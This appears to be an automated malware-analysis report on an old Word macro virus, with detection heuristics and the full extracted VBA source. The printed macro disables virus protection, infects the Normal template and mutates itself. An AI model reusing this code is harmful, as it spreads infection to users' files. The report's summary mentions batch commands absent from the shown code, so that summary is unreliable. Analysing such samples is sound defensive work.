MALICIOUS
260
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
The sample is a legacy Word document containing obfuscated VBA macros, specifically an AutoClose macro, which is a strong indicator of malicious intent. The macros appear to be designed to execute a batch script named 'PcGuru4.bat', as indicated by the embedded text and the 'type PcGuru4.bat >> PcGuru4.bat' commands. The presence of 'NAENBGOURSG' and 'PcGuru4 virus' suggests a known or custom malware family, but without further context, it is classified as unknown.
Heuristics 7
-
ClamAV: Doc.Trojan.CPCK-3 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.CPCK-3
-
Embedded Office document has suspicious static findings critical EMBEDDED_OFFICE_CHILD_STATIC_TRIAGEA CFB/OLE Office document was found inside another file type and its carved contents matched Office exploit or payload heuristics. This catches wrapped exploit documents where the top-level file routes to a PE, archive, or generic scanner instead of Office.
-
OLE document has large unaccounted-for region high OLE_SLACK_ANOMALYOLE file is 40,448 bytes but its declared streams total only 16,384 bytes — 24,064 bytes (59%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Auto_Close macro high OLE_VBA_AUTOCLOSEAuto_Close macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
CFB header with no readable streams medium OLE_PARSE_EMPTY_STREAMSThe file begins with a valid OLE2/CFB header but exposes no directory streams. A non-empty compound document with an unreadable directory is anomalous — it is seen with truncated/corrupt files and, more importantly, with content deliberately shifted off byte boundaries to defeat parsers while the host application still recovers the object.
Extracted artifacts 4
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3181 bytes |
SHA-256: b9a06131acb4736875b3429fe0c5a2cc898e0c02adec56caae5428181a01f0f3 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Document_Close()
C = LnGGi + AjRPz + JhRIe + TyUIo + QyNKt + NlFGh + SnVUv + PeFLx + VlAMx + R
On Error Resume Next
K = BtIGf + VrGDw + OqJPs + NvEMy + T
Options.SaveNormalPrompt = 0
H = RrGUm + NqCMk + UhALf + JlLLp + I
IF44 = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
Q = BuVBr + IpDKu + NoDUl + LrCRp + N
Options.ConfirmConversions = 0
E = AvBCs + CzLOo + SyEOq + HwPUo + BjIKp + EsCMw + UxJGg + QtOFy + AsRGu + KuHAp + T
Application.EnableCancelKey = 0
R = QfHLy + NqVCf + NsDKv + VxAHn + UoISh + OkVHp + JkDJo + L
Options.VirusProtection = 0
C = LuNKl + TrGGw + LvMHg + KvPQm + RwREe + ByRIp + C
CV86 = ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
J = BkLMv + KjQIg + QyNPz + I
If CV86 > 0 And IF44 > 0 Then GoTo RU83
E = ViPJj + GsJUx + OsCEy + JeLKe + I
If CV86 = 0 Then
O = GoDLe + MfOJk + BjPKw + EsRBo + QiHVi + T
Set BI83 = ActiveDocument.VBProject.VBComponents.Item(1)
P = JxURk + IzDDo + IxGOh + KvTIs + QvJFg + NrISn + UoHTu + FwHAj + StPIi + QqBJs + G
PK13 = True
E = DmVFf + CeNNg + MuSBq + QuIIo + FnEBg + ClTFf + SqKQh + IvHJw + NxEPo + V
End If
M = AqGQg + SwCAw + IvVTn + QwFAh + RiHJn + RnEEr + H
If IF44 = 0 Then
O = JnBMv + VfVSq + ReFDk + AsPCx + GrMGt + RtIIh + JkOIf + L
Set BI83 = NormalTemplate.VBProject.VBComponents.Item(1)
L = MjKTt + OgGIz + GeQMm + FoRSx + J
NL71 = True
E = JkKIf + VmLNy + G
End If
L = DqMMi + ArBGm + N
If NL71 <> True And PK13 <> True Then GoTo RU83
U = UjMJj + DyFQf + HkRAi + KvNTf + OzOVz + B
If NL71 = True Then BI83.CodeModule.AddFromString ("Sub AutoClose()" & vbCr & ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(2, CV86 - 1))
P = MiABn + GqLQq + HyIMj + MlRJi + P
If PK13 = True Then BI83.CodeModule.AddFromString ("Sub Document_Close()" & vbCr & NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(2, IF44 - 1))
C = EiBFf + SvEFf + FuPOi + QtSPg + EsMHv + MmDBm + SlJEp + VjIKn + OzOTs + J
With BI83.CodeModule
G = HqQJk + LwGBe + GmGSs + RwGBp + JmAHx + HjNVh + MmETs + NmQPk + QuMLn + J
For x = 2 To (BI83.CodeModule.CountOfLines - 1) Step 2
S = VoMKz + IwODv + IxNPq + JsPEz + TzKQj + E
For y = 1 To (Int(Rnd * 10) + 2)
A = ThJKs + FiLLm + BkFBt + VsOHr + HvEJm + FkMNy + D
HP61 = HP61 + (Chr(65 + Int(Rnd * 22))) & (Chr(122 - Int(Rnd * 22))) & (Chr(65 + Int(Rnd * 22))) & (Chr(65 + Int(Rnd * 22))) & (Chr(122 - Int(Rnd * 22))) & " + "
S = InGSg + LrAFw + OeGFg + CnNNk + C
Next y
I = SuOIh + JhEQg + EeVTo + OpDOm + SrBLy + J
.replaceline x, (Chr(65 + Int(Rnd * 22))) & " = " & HP61 & (Chr(65 + Int(Rnd * 22)))
U = VzONo + AkGVt + IsHFm + PuMMe + F
HP61 = ""
D = QrNKp + CeDMl + ClQRq + BpMBq + CwGVm + GqKBp + JfGDo + HoIFy + OrMTq + NrBCw + Q
Next x
M = DzPSo + ReLBm + HtPIr + EgDIm + Q
End With
T = HzRUt + EfEJs + HeMLx + A
RU83:
Q = PuUKk + IuNMp + OjBDx + BnVEs + TpFSy + CeSSe + FlNVq + BgDFm + IoUMe + I
End Sub
|
|||
macros_1.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1383 bytes |
SHA-256: e7b6d0537683df5282aeead1f6528075667158d4ffa1be2031799ceb131b7d56 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub Document_Close() C = LnGGi + AjRPz + JhRIe + TyUIo + QyNKt + NlFGh + SnVUv + PeFLx + VlAMx + R On Error Resume Next K = BtIGf + VrGDw + OqJPs + NvEMy + T Options.SaveNormalPrompt = 0 H = RrGUm + NqCMk + UhALf + JlLLp + I IF44 = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines Q = BuVBr + IpDKu + NoDUl + LrCRp + N Options.ConfirmConversions = 0 E = AvBCs + CzLOo + SyEOq + HwPUo + BjIKp + EsCMw + UxJGg + QtOFy + AsRGu + KuHAp + T Application.EnableCancelKey = 0 R = QfHLy + NqVCf + NsDKv + VxAHn + UoISh + OkVHp + JkDJo + L Options.VirusProtection = 0 C = LuNKl + TrGGw + LvMHg + KvPQm + RwREe + ByRIp + C CV86 = ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines J = BkLMv + KjQIg + QyNPz + I If CV86 > 0 And IF44 > 0 Then GoTo RU83 E = ViPJj + GsJUx + OsCEy + JeLKe + I If CV86 = 0 Then O = GoDLe + MfOJk + BjPKw + EsRBo + QiHVi + T Set BI83 = ActiveDocument.VBProject.VBComponents.Item(1) P = JxURk + IzDDo + IxGOh + KvTIs + QvJFg + NrISn + UoHTu + FwHAj + StPIi + QqBJs + G PK13 = True E = DmVFf + CeNNg + MuSBq + QuIIo + FnEBg + ClTFf + SqKQh + IvHJw + NxEPo + |
|||
embedded_office_off00004000.ole |
embedded-office | Embedded OLE/CFB Office body inside ole container at offset 0x4000 | 40448 bytes |
SHA-256: a368b2b2eb7204eccce95c65220e592991179759505587d30ec1d58d63d690c8 |
|||
embedded_office_off00008616.ole |
embedded-office | Embedded OLE/CFB Office body inside ole container at offset 0x8616 | 22506 bytes |
SHA-256: c4339666b4474c22a9e2a1fdf562768a42103ce53cb3832091a509ef6bde6439 |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.